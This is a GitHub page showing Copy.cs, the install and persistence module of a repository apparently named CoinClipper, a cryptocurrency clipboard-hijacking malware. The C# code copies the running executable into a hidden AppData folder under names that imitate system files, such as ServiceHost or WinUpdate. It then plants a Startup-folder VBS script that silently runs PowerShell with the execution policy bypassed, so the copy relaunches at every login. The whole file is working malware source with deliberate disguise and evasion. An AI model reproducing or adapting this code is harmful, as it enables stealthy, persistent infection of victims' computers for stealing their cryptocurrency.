CoinClipper/Copy.cs at main · PyDevOG/CoinClipper · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
using System;
using System.Diagnostics;
using System.IO;

namespace CoinClipper
{
    class Copy
    {
        private static string installBasePath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Microsoft", "SystemData");

        public static string Install()
        {
            try
            {
                Directory.CreateDirectory(installBasePath);

                string markerFile = Path.Combine(installBasePath, "installed.txt");
                if (File.Exists(markerFile))
                {
                    string oldExePath = File.ReadAllText(markerFile).Trim();
                    if (!string.IsNullOrEmpty(oldExePath) && File.Exists(oldExePath))
                    {
                        return oldExePath;
                    }
                }


                string targetExe = Path.Combine(installBasePath, GenerateLegitFileName());
                string currentProcess = Process.GetCurrentProcess().MainModule.FileName;
                File.Copy(currentProcess, targetExe, true);
                File.WriteAllText(markerFile, targetExe);


                CreatePowerShellAndBatForStartup(targetExe);

                return targetExe;
            }
            catch (Exception)
            {

                return null;
            }
        }

        private static string GenerateRandomString(int length)
        {
            const string chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
            Random random = new Random();
            char[] stringChars = new char[length];
            for (int i = 0; i < length; i++)
            {
                stringChars[i] = chars[random.Next(chars.Length)];
            }
            return new string(stringChars);
        }

        private static string GenerateLegitFileName()
        {
            string[] names = { "ServiceHost", "WinUpdate", "SysHelper", "DataSync" };
            string randomSuffix = GenerateRandomString(5);
            return $"{names[new Random().Next(names.Length)]}{randomSuffix}.exe";
        }

        private static void CreatePowerShellAndBatForStartup(string payloadPath)
        {
            try
            {
                string startupFolder = Environment.GetFolderPath(Environment.SpecialFolder.Startup);


                string psScriptPath = Path.Combine(installBasePath, GenerateRandomString(8) + ".ps1");
                string psScriptContent = $"Start-Process -FilePath '{payloadPath}' -WindowStyle Hidden";
                File.WriteAllText(psScriptPath, psScriptContent);


                string escapedPsScriptPath = psScriptPath.Replace("\\", "\\\\");


                string vbsFilePath = Path.Combine(startupFolder, GenerateRandomString(8) + ".vbs");


                string vbsContent =
                    "Set objShell = CreateObject(\"Wscript.Shell\")\n" +
                    $"objShell.Run \"powershell.exe -ExecutionPolicy Bypass -File \"\"{escapedPsScriptPath}\"\"\", 0, False";

                File.WriteAllText(vbsFilePath, vbsContent);
            }
            catch (Exception)
            {

            }
        }

    }
}